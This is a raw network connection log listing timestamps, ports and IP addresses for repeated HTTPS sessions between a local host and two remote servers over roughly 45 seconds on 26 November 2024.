Nov 26, 2024 09:04:05.612396955 CET	49758	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:04:05.619128942 CET	49758	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:04:05.619139910 CET	443	49758	199.232.192.209	192.168.2.4
Nov 26, 2024 09:04:05.619324923 CET	443	49758	199.232.192.209	192.168.2.4
Nov 26, 2024 09:04:05.619368076 CET	49758	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:04:05.623230934 CET	49758	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:04:05.623249054 CET	443	49758	199.232.192.209	192.168.2.4
Nov 26, 2024 09:04:05.644083977 CET	443	49757	199.232.192.209	192.168.2.4
Nov 26, 2024 09:04:05.644223928 CET	49757	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:04:05.649748087 CET	49757	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:04:05.649758101 CET	443	49757	199.232.192.209	192.168.2.4
Nov 26, 2024 09:04:05.649893999 CET	49757	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:04:05.649926901 CET	443	49757	199.232.192.209	192.168.2.4
Nov 26, 2024 09:04:05.650005102 CET	49757	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:04:07.158158064 CET	443	49759	20.233.83.145	192.168.2.4
Nov 26, 2024 09:04:07.158334017 CET	49759	443	192.168.2.4	20.233.83.145
Nov 26, 2024 09:04:07.159336090 CET	49759	443	192.168.2.4	20.233.83.145
Nov 26, 2024 09:04:07.159342051 CET	443	49759	20.233.83.145	192.168.2.4
Nov 26, 2024 09:04:07.159388065 CET	49759	443	192.168.2.4	20.233.83.145
Nov 26, 2024 09:04:07.159508944 CET	443	49759	20.233.83.145	192.168.2.4
Nov 26, 2024 09:04:07.159822941 CET	49759	443	192.168.2.4	20.233.83.145
Nov 26, 2024 09:04:10.233875990 CET	49760	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:04:10.233937025 CET	443	49760	199.232.192.209	192.168.2.4
Nov 26, 2024 09:04:10.234038115 CET	49760	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:04:10.235085011 CET	49760	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:04:10.235096931 CET	443	49760	199.232.192.209	192.168.2.4
Nov 26, 2024 09:04:10.639810085 CET	49761	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:04:10.639846087 CET	443	49761	199.232.192.209	192.168.2.4
Nov 26, 2024 09:04:10.639938116 CET	49761	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:04:10.640549898 CET	49761	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:04:10.640568018 CET	443	49761	199.232.192.209	192.168.2.4
Nov 26, 2024 09:04:10.655225992 CET	49762	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:04:10.655270100 CET	443	49762	199.232.192.209	192.168.2.4
Nov 26, 2024 09:04:10.655453920 CET	49762	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:04:10.655879021 CET	49762	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:04:10.655893087 CET	443	49762	199.232.192.209	192.168.2.4
Nov 26, 2024 09:04:11.487687111 CET	443	49760	199.232.192.209	192.168.2.4
Nov 26, 2024 09:04:11.487812996 CET	49760	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:04:11.489053011 CET	49760	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:04:11.489063978 CET	443	49760	199.232.192.209	192.168.2.4
Nov 26, 2024 09:04:11.489140034 CET	49760	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:04:11.489240885 CET	443	49760	199.232.192.209	192.168.2.4
Nov 26, 2024 09:04:11.489304066 CET	49760	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:04:11.893188953 CET	443	49761	199.232.192.209	192.168.2.4
Nov 26, 2024 09:04:11.893304110 CET	49761	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:04:11.894324064 CET	49761	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:04:11.894340992 CET	443	49761	199.232.192.209	192.168.2.4
Nov 26, 2024 09:04:11.894455910 CET	49761	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:04:11.894500971 CET	443	49761	199.232.192.209	192.168.2.4
Nov 26, 2024 09:04:11.894561052 CET	49761	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:04:11.908775091 CET	443	49762	199.232.192.209	192.168.2.4
Nov 26, 2024 09:04:11.908881903 CET	49762	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:04:11.909601927 CET	49762	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:04:11.909611940 CET	443	49762	199.232.192.209	192.168.2.4
Nov 26, 2024 09:04:11.909715891 CET	49762	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:04:11.909787893 CET	443	49762	199.232.192.209	192.168.2.4
Nov 26, 2024 09:04:11.909837008 CET	49762	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:04:12.171739101 CET	49763	443	192.168.2.4	20.233.83.145
Nov 26, 2024 09:04:12.171791077 CET	443	49763	20.233.83.145	192.168.2.4
Nov 26, 2024 09:04:12.171952963 CET	49763	443	192.168.2.4	20.233.83.145
Nov 26, 2024 09:04:12.172797918 CET	49763	443	192.168.2.4	20.233.83.145
Nov 26, 2024 09:04:12.172815084 CET	443	49763	20.233.83.145	192.168.2.4
Nov 26, 2024 09:04:13.838413000 CET	443	49763	20.233.83.145	192.168.2.4
Nov 26, 2024 09:04:13.838515043 CET	49763	443	192.168.2.4	20.233.83.145
Nov 26, 2024 09:04:13.839461088 CET	49763	443	192.168.2.4	20.233.83.145
Nov 26, 2024 09:04:13.839469910 CET	443	49763	20.233.83.145	192.168.2.4
Nov 26, 2024 09:04:13.839605093 CET	49763	443	192.168.2.4	20.233.83.145
Nov 26, 2024 09:04:13.839648962 CET	443	49763	20.233.83.145	192.168.2.4
Nov 26, 2024 09:04:13.839715004 CET	49763	443	192.168.2.4	20.233.83.145
Nov 26, 2024 09:04:16.483875036 CET	49764	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:04:16.483916044 CET	443	49764	199.232.192.209	192.168.2.4
Nov 26, 2024 09:04:16.484065056 CET	49764	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:04:16.485100985 CET	49764	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:04:16.485110998 CET	443	49764	199.232.192.209	192.168.2.4
Nov 26, 2024 09:04:16.905530930 CET	49765	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:04:16.905577898 CET	443	49765	199.232.192.209	192.168.2.4
Nov 26, 2024 09:04:16.905647039 CET	49765	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:04:16.907665968 CET	49765	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:04:16.907684088 CET	443	49765	199.232.192.209	192.168.2.4
Nov 26, 2024 09:04:16.921031952 CET	49766	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:04:16.921056032 CET	443	49766	199.232.192.209	192.168.2.4
Nov 26, 2024 09:04:16.921128035 CET	49766	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:04:16.922173977 CET	49766	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:04:16.922184944 CET	443	49766	199.232.192.209	192.168.2.4
Nov 26, 2024 09:04:17.694161892 CET	443	49764	199.232.192.209	192.168.2.4
Nov 26, 2024 09:04:17.694446087 CET	49764	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:04:17.695374012 CET	49764	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:04:17.695391893 CET	443	49764	199.232.192.209	192.168.2.4
Nov 26, 2024 09:04:17.695508957 CET	49764	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:04:17.695569038 CET	443	49764	199.232.192.209	192.168.2.4
Nov 26, 2024 09:04:17.695661068 CET	49764	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:04:18.128751993 CET	443	49766	199.232.192.209	192.168.2.4
Nov 26, 2024 09:04:18.128851891 CET	49766	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:04:18.130060911 CET	49766	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:04:18.130074024 CET	443	49766	199.232.192.209	192.168.2.4
Nov 26, 2024 09:04:18.130201101 CET	49766	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:04:18.130233049 CET	443	49766	199.232.192.209	192.168.2.4
Nov 26, 2024 09:04:18.130285978 CET	49766	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:04:18.159713030 CET	443	49765	199.232.192.209	192.168.2.4
Nov 26, 2024 09:04:18.159847975 CET	49765	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:04:18.160943985 CET	49765	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:04:18.160952091 CET	443	49765	199.232.192.209	192.168.2.4
Nov 26, 2024 09:04:18.161036968 CET	49765	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:04:18.161078930 CET	443	49765	199.232.192.209	192.168.2.4
Nov 26, 2024 09:04:18.161566973 CET	49765	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:04:18.843178988 CET	49767	443	192.168.2.4	20.233.83.145
Nov 26, 2024 09:04:18.843240976 CET	443	49767	20.233.83.145	192.168.2.4
Nov 26, 2024 09:04:18.843333006 CET	49767	443	192.168.2.4	20.233.83.145
Nov 26, 2024 09:04:18.844270945 CET	49767	443	192.168.2.4	20.233.83.145
Nov 26, 2024 09:04:18.844284058 CET	443	49767	20.233.83.145	192.168.2.4
Nov 26, 2024 09:04:20.528280020 CET	443	49767	20.233.83.145	192.168.2.4
Nov 26, 2024 09:04:20.528419018 CET	49767	443	192.168.2.4	20.233.83.145
Nov 26, 2024 09:04:20.529428005 CET	49767	443	192.168.2.4	20.233.83.145
Nov 26, 2024 09:04:20.529442072 CET	443	49767	20.233.83.145	192.168.2.4
Nov 26, 2024 09:04:20.529535055 CET	49767	443	192.168.2.4	20.233.83.145
Nov 26, 2024 09:04:20.530143023 CET	443	49767	20.233.83.145	192.168.2.4
Nov 26, 2024 09:04:20.530216932 CET	49767	443	192.168.2.4	20.233.83.145
Nov 26, 2024 09:04:22.702280998 CET	49768	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:04:22.702312946 CET	443	49768	199.232.192.209	192.168.2.4
Nov 26, 2024 09:04:22.702393055 CET	49768	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:04:22.703875065 CET	49768	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:04:22.703886986 CET	443	49768	199.232.192.209	192.168.2.4
Nov 26, 2024 09:04:23.139904976 CET	49770	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:04:23.139940977 CET	443	49770	199.232.192.209	192.168.2.4
Nov 26, 2024 09:04:23.140064001 CET	49770	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:04:23.142436981 CET	49770	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:04:23.142447948 CET	443	49770	199.232.192.209	192.168.2.4
Nov 26, 2024 09:04:23.171158075 CET	49771	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:04:23.171207905 CET	443	49771	199.232.192.209	192.168.2.4
Nov 26, 2024 09:04:23.171287060 CET	49771	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:04:23.171864986 CET	49771	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:04:23.171880960 CET	443	49771	199.232.192.209	192.168.2.4
Nov 26, 2024 09:04:23.960952044 CET	443	49768	199.232.192.209	192.168.2.4
Nov 26, 2024 09:04:23.961055040 CET	49768	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:04:23.962213039 CET	49768	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:04:23.962223053 CET	443	49768	199.232.192.209	192.168.2.4
Nov 26, 2024 09:04:23.962356091 CET	49768	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:04:23.964097023 CET	443	49768	199.232.192.209	192.168.2.4
Nov 26, 2024 09:04:23.964154959 CET	49768	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:04:24.395597935 CET	443	49770	199.232.192.209	192.168.2.4
Nov 26, 2024 09:04:24.395760059 CET	49770	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:04:24.396735907 CET	49770	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:04:24.396747112 CET	443	49770	199.232.192.209	192.168.2.4
Nov 26, 2024 09:04:24.396851063 CET	49770	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:04:24.396908045 CET	443	49770	199.232.192.209	192.168.2.4
Nov 26, 2024 09:04:24.396982908 CET	49770	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:04:24.425478935 CET	443	49771	199.232.192.209	192.168.2.4
Nov 26, 2024 09:04:24.425594091 CET	49771	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:04:24.426569939 CET	49771	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:04:24.426582098 CET	443	49771	199.232.192.209	192.168.2.4
Nov 26, 2024 09:04:24.426711082 CET	49771	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:04:24.426765919 CET	443	49771	199.232.192.209	192.168.2.4
Nov 26, 2024 09:04:24.426837921 CET	49771	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:04:25.546248913 CET	49772	443	192.168.2.4	20.233.83.145
Nov 26, 2024 09:04:25.546291113 CET	443	49772	20.233.83.145	192.168.2.4
Nov 26, 2024 09:04:25.546384096 CET	49772	443	192.168.2.4	20.233.83.145
Nov 26, 2024 09:04:25.547317028 CET	49772	443	192.168.2.4	20.233.83.145
Nov 26, 2024 09:04:25.547329903 CET	443	49772	20.233.83.145	192.168.2.4
Nov 26, 2024 09:04:27.127434969 CET	443	49772	20.233.83.145	192.168.2.4
Nov 26, 2024 09:04:27.127533913 CET	49772	443	192.168.2.4	20.233.83.145
Nov 26, 2024 09:04:27.128741980 CET	49772	443	192.168.2.4	20.233.83.145
Nov 26, 2024 09:04:27.128751993 CET	443	49772	20.233.83.145	192.168.2.4
Nov 26, 2024 09:04:27.128804922 CET	49772	443	192.168.2.4	20.233.83.145
Nov 26, 2024 09:04:27.128951073 CET	443	49772	20.233.83.145	192.168.2.4
Nov 26, 2024 09:04:27.129014015 CET	49772	443	192.168.2.4	20.233.83.145
Nov 26, 2024 09:04:28.952296972 CET	49784	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:04:28.952342987 CET	443	49784	199.232.192.209	192.168.2.4
Nov 26, 2024 09:04:28.952451944 CET	49784	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:04:28.953067064 CET	49784	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:04:28.953077078 CET	443	49784	199.232.192.209	192.168.2.4
Nov 26, 2024 09:04:29.389744043 CET	49785	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:04:29.389796972 CET	443	49785	199.232.192.209	192.168.2.4
Nov 26, 2024 09:04:29.389859915 CET	49785	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:04:29.390480042 CET	49785	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:04:29.390491009 CET	443	49785	199.232.192.209	192.168.2.4
Nov 26, 2024 09:04:29.436738968 CET	49786	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:04:29.436779976 CET	443	49786	199.232.192.209	192.168.2.4
Nov 26, 2024 09:04:29.436841011 CET	49786	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:04:29.437469959 CET	49786	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:04:29.437480927 CET	443	49786	199.232.192.209	192.168.2.4
Nov 26, 2024 09:04:30.206264019 CET	443	49784	199.232.192.209	192.168.2.4
Nov 26, 2024 09:04:30.206525087 CET	49784	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:04:30.207329988 CET	49784	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:04:30.207335949 CET	443	49784	199.232.192.209	192.168.2.4
Nov 26, 2024 09:04:30.207458019 CET	49784	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:04:30.207498074 CET	443	49784	199.232.192.209	192.168.2.4
Nov 26, 2024 09:04:30.207587004 CET	49784	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:04:30.597004890 CET	443	49785	199.232.192.209	192.168.2.4
Nov 26, 2024 09:04:30.597115040 CET	49785	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:04:30.606184006 CET	49785	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:04:30.606206894 CET	443	49785	199.232.192.209	192.168.2.4
Nov 26, 2024 09:04:30.606317997 CET	49785	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:04:30.606367111 CET	443	49785	199.232.192.209	192.168.2.4
Nov 26, 2024 09:04:30.606408119 CET	49785	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:04:30.691332102 CET	443	49786	199.232.192.209	192.168.2.4
Nov 26, 2024 09:04:30.691389084 CET	49786	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:04:30.701018095 CET	49786	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:04:30.701029062 CET	443	49786	199.232.192.209	192.168.2.4
Nov 26, 2024 09:04:30.701124907 CET	49786	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:04:30.701191902 CET	443	49786	199.232.192.209	192.168.2.4
Nov 26, 2024 09:04:30.701234102 CET	49786	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:04:32.124196053 CET	49792	443	192.168.2.4	20.233.83.145
Nov 26, 2024 09:04:32.124258995 CET	443	49792	20.233.83.145	192.168.2.4
Nov 26, 2024 09:04:32.124491930 CET	49792	443	192.168.2.4	20.233.83.145
Nov 26, 2024 09:04:32.125153065 CET	49792	443	192.168.2.4	20.233.83.145
Nov 26, 2024 09:04:32.125169992 CET	443	49792	20.233.83.145	192.168.2.4
Nov 26, 2024 09:04:33.753029108 CET	443	49792	20.233.83.145	192.168.2.4
Nov 26, 2024 09:04:33.753195047 CET	49792	443	192.168.2.4	20.233.83.145
Nov 26, 2024 09:04:33.754153013 CET	49792	443	192.168.2.4	20.233.83.145
Nov 26, 2024 09:04:33.754163027 CET	443	49792	20.233.83.145	192.168.2.4
Nov 26, 2024 09:04:33.754261017 CET	49792	443	192.168.2.4	20.233.83.145
Nov 26, 2024 09:04:33.754338980 CET	443	49792	20.233.83.145	192.168.2.4
Nov 26, 2024 09:04:33.754468918 CET	49792	443	192.168.2.4	20.233.83.145
Nov 26, 2024 09:04:35.452898979 CET	49803	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:04:35.452953100 CET	443	49803	199.232.192.209	192.168.2.4
Nov 26, 2024 09:04:35.453027010 CET	49803	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:04:35.454046011 CET	49803	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:04:35.454072952 CET	443	49803	199.232.192.209	192.168.2.4
Nov 26, 2024 09:04:35.609792948 CET	49804	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:04:35.609839916 CET	443	49804	199.232.192.209	192.168.2.4
Nov 26, 2024 09:04:35.610035896 CET	49804	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:04:35.610697985 CET	49804	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:04:35.610709906 CET	443	49804	199.232.192.209	192.168.2.4
Nov 26, 2024 09:04:35.702430010 CET	49805	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:04:35.702481985 CET	443	49805	199.232.192.209	192.168.2.4
Nov 26, 2024 09:04:35.703233957 CET	49805	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:04:35.703932047 CET	49805	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:04:35.703943014 CET	443	49805	199.232.192.209	192.168.2.4
Nov 26, 2024 09:04:36.707401037 CET	443	49803	199.232.192.209	192.168.2.4
Nov 26, 2024 09:04:36.707510948 CET	49803	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:04:36.711354971 CET	49803	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:04:36.711366892 CET	443	49803	199.232.192.209	192.168.2.4
Nov 26, 2024 09:04:36.711599112 CET	443	49803	199.232.192.209	192.168.2.4
Nov 26, 2024 09:04:36.711662054 CET	49803	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:04:36.715835094 CET	49803	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:04:36.715853930 CET	443	49803	199.232.192.209	192.168.2.4
Nov 26, 2024 09:04:36.913258076 CET	443	49804	199.232.192.209	192.168.2.4
Nov 26, 2024 09:04:36.913342953 CET	49804	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:04:36.914417982 CET	49804	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:04:36.914424896 CET	443	49804	199.232.192.209	192.168.2.4
Nov 26, 2024 09:04:36.914519072 CET	49804	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:04:36.914891005 CET	443	49804	199.232.192.209	192.168.2.4
Nov 26, 2024 09:04:36.914949894 CET	49804	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:04:36.955964088 CET	443	49805	199.232.192.209	192.168.2.4
Nov 26, 2024 09:04:36.956052065 CET	49805	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:04:36.957098961 CET	49805	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:04:36.957108021 CET	443	49805	199.232.192.209	192.168.2.4
Nov 26, 2024 09:04:36.957232952 CET	443	49805	199.232.192.209	192.168.2.4
Nov 26, 2024 09:04:36.957271099 CET	49805	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:04:36.957271099 CET	49805	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:04:36.957278967 CET	443	49805	199.232.192.209	192.168.2.4
Nov 26, 2024 09:04:38.765377998 CET	49811	443	192.168.2.4	20.233.83.145
Nov 26, 2024 09:04:38.765433073 CET	443	49811	20.233.83.145	192.168.2.4
Nov 26, 2024 09:04:38.765512943 CET	49811	443	192.168.2.4	20.233.83.145
Nov 26, 2024 09:04:38.766045094 CET	49811	443	192.168.2.4	20.233.83.145
Nov 26, 2024 09:04:38.766058922 CET	443	49811	20.233.83.145	192.168.2.4
Nov 26, 2024 09:04:40.401072025 CET	443	49811	20.233.83.145	192.168.2.4
Nov 26, 2024 09:04:40.401149988 CET	49811	443	192.168.2.4	20.233.83.145
Nov 26, 2024 09:04:40.403847933 CET	49811	443	192.168.2.4	20.233.83.145
Nov 26, 2024 09:04:40.403858900 CET	443	49811	20.233.83.145	192.168.2.4
Nov 26, 2024 09:04:40.404019117 CET	443	49811	20.233.83.145	192.168.2.4
Nov 26, 2024 09:04:40.404020071 CET	49811	443	192.168.2.4	20.233.83.145
Nov 26, 2024 09:04:40.404032946 CET	443	49811	20.233.83.145	192.168.2.4
Nov 26, 2024 09:04:40.404069901 CET	49811	443	192.168.2.4	20.233.83.145
Nov 26, 2024 09:04:41.702577114 CET	49818	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:04:41.702600956 CET	443	49818	199.232.192.209	192.168.2.4
Nov 26, 2024 09:04:41.702677011 CET	49818	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:04:41.703366995 CET	49818	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:04:41.703377008 CET	443	49818	199.232.192.209	192.168.2.4
Nov 26, 2024 09:04:41.905697107 CET	49821	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:04:41.905723095 CET	443	49821	199.232.192.209	192.168.2.4
Nov 26, 2024 09:04:41.905803919 CET	49821	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:04:41.907324076 CET	49821	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:04:41.907332897 CET	443	49821	199.232.192.209	192.168.2.4
Nov 26, 2024 09:04:41.967932940 CET	49822	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:04:41.967995882 CET	443	49822	199.232.192.209	192.168.2.4
Nov 26, 2024 09:04:41.968569040 CET	49822	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:04:41.968847036 CET	49822	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:04:41.968863964 CET	443	49822	199.232.192.209	192.168.2.4
Nov 26, 2024 09:04:43.228641033 CET	443	49818	199.232.192.209	192.168.2.4
Nov 26, 2024 09:04:43.228894949 CET	49818	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:04:43.229907990 CET	49818	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:04:43.229937077 CET	443	49818	199.232.192.209	192.168.2.4
Nov 26, 2024 09:04:43.230024099 CET	49818	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:04:43.230109930 CET	443	49818	199.232.192.209	192.168.2.4
Nov 26, 2024 09:04:43.230170965 CET	49818	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:04:43.267333984 CET	443	49822	199.232.192.209	192.168.2.4
Nov 26, 2024 09:04:43.267456055 CET	49822	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:04:43.268255949 CET	49822	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:04:43.268266916 CET	443	49822	199.232.192.209	192.168.2.4
Nov 26, 2024 09:04:43.268388033 CET	49822	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:04:43.268388033 CET	443	49822	199.232.192.209	192.168.2.4
Nov 26, 2024 09:04:43.268402100 CET	443	49822	199.232.192.209	192.168.2.4
Nov 26, 2024 09:04:43.268428087 CET	49822	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:04:43.486952066 CET	443	49821	199.232.192.209	192.168.2.4
Nov 26, 2024 09:04:43.487171888 CET	49821	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:04:43.488169909 CET	49821	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:04:43.488177061 CET	443	49821	199.232.192.209	192.168.2.4
Nov 26, 2024 09:04:43.488332987 CET	49821	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:04:43.488333941 CET	443	49821	199.232.192.209	192.168.2.4
Nov 26, 2024 09:04:43.488346100 CET	443	49821	199.232.192.209	192.168.2.4
Nov 26, 2024 09:04:43.488377094 CET	49821	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:04:45.405744076 CET	49829	443	192.168.2.4	20.233.83.145
Nov 26, 2024 09:04:45.405796051 CET	443	49829	20.233.83.145	192.168.2.4
Nov 26, 2024 09:04:45.406011105 CET	49829	443	192.168.2.4	20.233.83.145
Nov 26, 2024 09:04:45.406441927 CET	49829	443	192.168.2.4	20.233.83.145
Nov 26, 2024 09:04:45.406451941 CET	443	49829	20.233.83.145	192.168.2.4
Nov 26, 2024 09:04:47.082689047 CET	443	49829	20.233.83.145	192.168.2.4
Nov 26, 2024 09:04:47.082801104 CET	49829	443	192.168.2.4	20.233.83.145
Nov 26, 2024 09:04:47.083708048 CET	49829	443	192.168.2.4	20.233.83.145
Nov 26, 2024 09:04:47.083714962 CET	443	49829	20.233.83.145	192.168.2.4
Nov 26, 2024 09:04:47.083802938 CET	49829	443	192.168.2.4	20.233.83.145
Nov 26, 2024 09:04:47.083879948 CET	443	49829	20.233.83.145	192.168.2.4
Nov 26, 2024 09:04:47.083935976 CET	49829	443	192.168.2.4	20.233.83.145
Nov 26, 2024 09:04:48.234127045 CET	49835	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:04:48.234173059 CET	443	49835	199.232.192.209	192.168.2.4
Nov 26, 2024 09:04:48.234745979 CET	49835	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:04:48.235789061 CET	49835	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:04:48.235805035 CET	443	49835	199.232.192.209	192.168.2.4
Nov 26, 2024 09:04:48.280484915 CET	49837	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:04:48.280524015 CET	443	49837	199.232.192.209	192.168.2.4
Nov 26, 2024 09:04:48.280596018 CET	49837	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:04:48.281235933 CET	49837	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:04:48.281245947 CET	443	49837	199.232.192.209	192.168.2.4
Nov 26, 2024 09:04:48.483980894 CET	49839	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:04:48.484036922 CET	443	49839	199.232.192.209	192.168.2.4
Nov 26, 2024 09:04:48.484143972 CET	49839	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:04:48.486748934 CET	49839	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:04:48.486777067 CET	443	49839	199.232.192.209	192.168.2.4
Nov 26, 2024 09:04:49.819755077 CET	443	49835	199.232.192.209	192.168.2.4
Nov 26, 2024 09:04:49.819864988 CET	49835	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:04:49.820907116 CET	49835	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:04:49.820919037 CET	443	49835	199.232.192.209	192.168.2.4
Nov 26, 2024 09:04:49.821006060 CET	49835	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:04:49.821352959 CET	443	49835	199.232.192.209	192.168.2.4
Nov 26, 2024 09:04:49.821419001 CET	49835	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:04:49.859074116 CET	443	49837	199.232.192.209	192.168.2.4
Nov 26, 2024 09:04:49.859224081 CET	49837	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:04:49.860249996 CET	49837	443	192.168.2.4	199.232.192.209
Nov 26, 2024 09:04:49.860268116 CET	443	49837	199.232.192.209	192.168.2.4
